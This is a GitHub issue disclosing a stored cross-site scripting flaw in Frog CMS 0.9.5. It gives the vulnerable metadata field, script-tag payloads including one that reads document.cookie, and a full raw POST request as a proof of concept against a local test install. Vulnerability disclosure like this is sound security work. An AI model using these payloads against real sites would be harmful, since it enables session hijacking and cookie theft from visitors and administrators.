Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #6

Open
Oran9e opened this issue Apr 23, 2018 · 0 comments
Open

Frog CMS 0.9.5 has a stored Cross Site Scripting Vulnerability #6

Oran9e opened this issue Apr 23, 2018 · 0 comments

Comments

@Oran9e
Copy link

Oran9e commented Apr 23, 2018

I have found a stored Cross Site Scripting Vulnerability.
log into the system as an administrator role:http://127.0.0.1/test/FrogCMS-master/admin/
publish an article,and you can click it.
pages-->Edit Page-->Metadata
payload: "/><script>confirm(1234)</script>
i think you can see the following picture to konw more.
1
2

POC:
POST /test/FrogCMS-master/admin/?/page/edit/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/FrogCMS-master/admin/?/page/edit/3
Content-Type: application/x-www-form-urlencoded
Content-Length: 675
Cookie: current_tab=:tab-1; UM_distinctid=162db899f8a468-018514197574c8-17347a40-100200-162db899f8c3bc; CNZZDATA1707573=cnzz_eid%3D271628251-1524101653-http%253A%252F%252F127.0.0.1%252F%26ntime%3D1524101653; Hm_lvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_lastvisit=1726%091524191267%09%2Ftest%2Fphpwind_v9.0.2_utf8%2Fphpwind_v9.0.2_utf8_20170401%2Findex.php%3Fm%3Ddesign%26c%3Dapi%26token%3Dt8QiA81ydN%26id%3D7%26format%3D; PHPSESSID=k4mlmjoo06qvrnks6hbsut3795; yzmphp_adminid=02fcWP1tbVyO3qjAa1o4Oj7ByNDb2DbcZpROpdWw; yzmphp_adminname=f744FywtmY54ZekJU2rO-dU8YZXZce7dHJjsdStEKAEwM5M; Hm_lpvt_7b43330a4da4a6f4353e553988ee8a62=1524187137; rlF_visitor=Dn3slOh4nWLgDBhDSMUhGlC3PsR%2FyarbBZim4JqNJp2SKE9mCXr3gw%3D%3D; csrf_token=5ac0a94ca5abfea6; frog_auth_user=exp%3D1525680458%26id%3D1%26digest%3D5a4183bf1c5de0fa91a7f31422e9a38e
Connection: keep-alive
Upgrade-Insecure-Requests: 1

page%5Bparent_id%5D=1&page%5Btitle%5D=aaa&page%5Bslug%5D=about_us&page%5Bbreadcrumb%5D=aa&page%5Bkeywords%5D="/><script>confirm(1234)</script>&page%5Bdescription%5D=aa&page_tag%5Btags%5D=&page%5Bcreated_on%5D=2018-04-23&page%5Bcreated_on_time%5D=08%3A07%3A26&page%5Bpublished_on%5D=2018-04-23&page%5Bpublished_on_time%5D=08%3A07%3A27&part%5B0%5D%5Bname%5D=body&part%5B0%5D%5Bid%5D=3&part%5B0%5D%5Bfilter_id%5D=textile&part%5B0%5D%5Bcontent%5D=This+is+my+site.+I+live+in+this+city+...+I+do+some+nice+things%2C+like+this+and+%22Link+Text%22%3A&page%5Blayout_id%5D=&page%5Bbehavior_id%5D=&page%5Bstatus_id%5D=100&page%5Bneeds_login%5D=2&commit=Save+and+Close

when we published the article and we can see it from homepage.
URL:http://127.0.0.1/test/FrogCMS-master/
3
4

Anyone who visit the target page will be affected to triage JavaScript code, including administrator, editor, developer, and guest.
If people read our articles, we can easily get their cookie.
payload:"/><script>confirm(document.cookie)</script>
Affected Version:
0.9.5

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant